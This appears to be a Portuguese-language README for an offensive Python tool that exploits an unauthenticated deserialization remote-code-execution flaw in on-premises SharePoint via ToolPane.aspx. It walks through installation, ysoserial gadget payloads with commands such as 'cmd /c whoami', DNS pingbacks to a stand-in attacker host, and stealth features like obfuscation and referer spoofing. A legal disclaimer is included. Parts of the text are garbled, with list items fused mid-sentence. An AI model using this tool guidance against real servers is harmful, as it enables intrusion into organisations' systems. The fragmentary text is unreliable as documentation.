
Uma ferramenta de exploração Python sofisticada e orientada por assistente, visando CVE-2025-53770, uma vulnerabilidade crítica (CVSS 9.8) de execução remota de código (RCE) não autenticada no Microsoft SharePoint Server local (2016, 2019, Subscription Edition)
Divine Absolute é uma sofisticada ferramenta de exploração Python orientada por assistente, direcionada à CVE-2025-53770, uma vulnerabilidade crítica (CVSS 9.8) de execução remota de código (RCE) não autenticada em servidores SharePoint on-premises da Microsoft (2016, 2019, Subscription Edition). Esta vulnerabilidade, divulgada como zero-day em 19 de julho de 2025, decorre da desserialização de dados não confiáveis em /_layouts/15/ToolPane.aspx. A ferramenta é projetada apenas para testes de penetração éticos e pesquisa de segurança autorizada, oferecendo precisão, furtividade e adaptabilidade incomparáveis para reconhecimento, exploração e verificação.
Repositório: https://github.com/exfil0/CVE-2025-53770
⚠️ Aviso Legal: Esta ferramenta é para uso lícito e autorizado apenas em ambientes controlados, com permissão explícita. O uso não autorizado contra sistemas que você não possui ou não tem permissão para testar é ilegal e pode resultar em graves consequências legais. O autor não assume qualquer responsabilidade por uso indevido.
ToolPane.aspx com pontuação avançada e regex (ex.: 16.0.0.\d+-\w+?).ToolPane.aspx com bypasses robustos.WebRequest.Create, Dns.GetHostEntry).-enc)./xp.aspx, baseado em UUID).www.google.com), URLs personalizados ou caminhos internos do SharePoint (ex.: /_layouts/15/sharepoint.aspx)./_layouts/15/ToolPane.aspx./ToolPane.aspx, usar regras WAF (ex.: Cloudflare).pip install requests termcolor
pip install pythonnet
ysoserial.exe em um caminho conhecido (ex.: ./ysoserial.exe).# Ubuntu/Debian
sudo apt-get install mono-complete
# macOS (via Homebrew)
brew install mono
docker pull mcr.microsoft.com/sharepoint/server:2019
git clone https://github.com/exfil0/CVE-2025-53770.git
cd CVE-2025-53770
pip install -r requirements.txt
ysoserial.exe esteja acessível ou fornecer seu caminho durante a execução.Executar o assistente interativo:
python divine_absolute.py
Reconhecimento: Escaneia a presença e versão do SharePoint.Exploração: Envia payload para ToolPane.aspx.Completo: Reconhecimento + exploração (modo agressivo opcional).https://sharepoint.example.com).ObjectDataProvider) e comando (ex.: cmd /c whoami).http://attacker.com/callback ou sub.attacker.com).NONE, , ou snippet personalizado.python divine_absolute.py
# Selecionar: Modo=Reconhecimento, Alvo=https://sharepoint.example.com
python divine_absolute.py
# Selecionar: Modo=Exploração, Alvo=https://sharepoint.example.com, Payload=YSOSERIAL,
# caminho ysoserial.exe=./ysoserial.exe, Gadget=ObjectDataProvider,
# Comando="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
python divine_absolute.py
# Selecionar: Modo=Completo, Alvo=target_list.txt, Payload=FILE, Payload File=payload.b64,
# Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
python divine_absolute.py
# Selecionar: Modo=Exploração, Payload=PINGBACK, Pingback URL=sub.attacker.com
Os resultados são salvos em xanthorox_results.json com os campos:
target: URL testada.sharepoint_detected: Booleano.toolpane_accessible: Booleano.exploited: Booleano (payload enviado).verified_rce: Booleano/None (RCE confirmado).error: Quaisquer erros encontrados.Exemplo:
[
{
"target": "https://sharepoint.example.com",
"sharepoint_detected": true,
"toolpane_accessible": true,
"exploited": true,
"verified_rce": true,
"error": null
}
]
Esta versão corrige:
-enc); suporta não-PowerShell (ex.: cmd.exe) com avisos.pythonnet para pingback DNS confiável com Dns.GetHostEntry (experimental, requer gadget para efeito total).ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64 e verifique logs DNS.Dns.GetHostEntry no pythonnet pode não disparar sem uma cadeia de gadgets específica.Contribuições são bem-vindas! Por favor:
git checkout -b feature/minha-melhoria-incrivel).git commit -m "Adicionar melhoria incrível").git push origin feature/minha-melhoria-incrivel).Este projeto está licenciado sob a Licença MIT. Veja LICENSE para detalhes.
Nota: Sempre verifique payloads e configurações em um laboratório controlado antes do uso. Mantenha-se ético, mantenha-se legal.
RequestException e códigos de status/caminhos personalizáveis.MicrosoftSharePointTeamServices), caminhos (ex.: /versions.aspx) e regex.BASIC_REFLECTIONCONCAT_OBFUSCATEDNONE, FIXED (ex.: /xp.aspx), RANDOM (baseado em UUID).DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL.http://127.0.0.1:8080)./sitepages/result.txt), regex (ex.: Xanthorox.*), códigos de status (ex.: 200,403), tentativas, atraso e timeout.